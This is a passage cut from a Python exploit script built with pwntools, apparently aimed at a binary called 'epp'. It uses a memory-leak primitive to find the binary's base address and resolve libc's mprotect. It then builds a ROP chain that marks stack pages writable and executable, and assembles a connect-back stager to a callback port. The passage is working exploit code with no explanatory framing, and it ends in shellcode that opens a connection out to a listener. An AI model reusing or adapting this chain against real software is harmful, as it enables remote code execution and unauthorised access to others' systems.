logging.info(
"epp base address: 0x{:X}".format(epp_ba))
break
epp_ba -= 0x1000
def leak(address):
return a_read(s, address, 8)
epp_dyn_elf = DynELF(leak, epp_ba)
libc_mprotect = epp_dyn_elf.lookup('mprotect', 'libc')
context.clear(arch='amd64')
binary = ELF(epp_path)
binary.address = epp_ba
binary.symbols = {'mprotect': libc_mprotect}
rop = ROP(binary)
# Mark the current stack page, and the one just before, incase we are on a boundary.
rop.call(
'mprotect', (stack_frame.previous_frame_stack_base_pointer & ~0xFFF, 0x2000, 0x7))
target_ip = socket.gethostbyname(socket.gethostname())
mprotect_rop = rop.chain()
logging.info(rop.dump())
# We are gonna be a little lazy and just end with an infinite loop,
# we make no attempt to clean up the stack and continue normal
# execution.
connect_stager = asm(connectstager(target_ip, CALLBACK_PORT) + infloop())
